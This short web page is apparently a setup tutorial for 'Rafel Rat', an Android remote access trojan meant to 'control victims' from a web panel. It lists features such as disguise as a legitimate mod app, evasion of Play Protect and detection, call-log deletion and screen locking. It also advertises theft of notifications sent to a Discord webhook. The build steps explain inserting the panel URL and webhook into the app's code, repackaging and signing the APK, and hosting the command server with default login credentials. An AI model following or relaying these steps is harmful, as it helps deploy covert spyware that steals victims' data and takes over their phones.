Rafel Rat+Tutorial

Rafel Rat+Tutorial


Rafel Rat+Tutorial

Rafel is Remote Access Tool Used to Control Victims Using WebPanel With More Advance Features..

Main Features :
Admin Permission
Add App To White List(Ignore Battery Optimisation)
Looks Like Legit Mod App
Runs In Background Even App is Closed(May not work on some Devices)
Accessibility Feature(Cause Erros in some device –> ignore it)
Support Android v5 – v12
No Port Forwarding Needed
Acquire Wakelock
Fully Undetectable
Bypass PlayProtect
Lock Device Screen
Change Wallpaper
Vibrate Device
Delete Calls Logs
Notify Victims Via Discord
steal notifications(send through discord)
Added AutoStart For (poco,xiaomi,oppo,vivo,LetV,Honor)Building Apk With Android Studio
Open Project BlackMart in Android Studio
Put the command.php link of server in InternalService.class class
Now open NotificationListener.java and enter replace with your discord webhook url
Build the Project
Zipalign and sign the Apk…Building Apk with ApkEasyTool:
Download BlackMartapk and decompile with Apktool and navigate to smali_classes2\com\velociraptor\raptor
Open InternalService.smali
Replace this with your Panel Url const-string v0, “https://your-webpanel-url/public/commands.php”
Now open NotificationListener.smali and enter replace with your discord webhook urlBuilding Server.
Upload Files in server Folder to Your HostingPanel
Now Open login.php
Enter Username Hande Password Ercel
Note : Make Sure your webhosting site uses Https and should have valid connection…I recommend 000webhost.com
You can now use panel to send commands and also refresh after it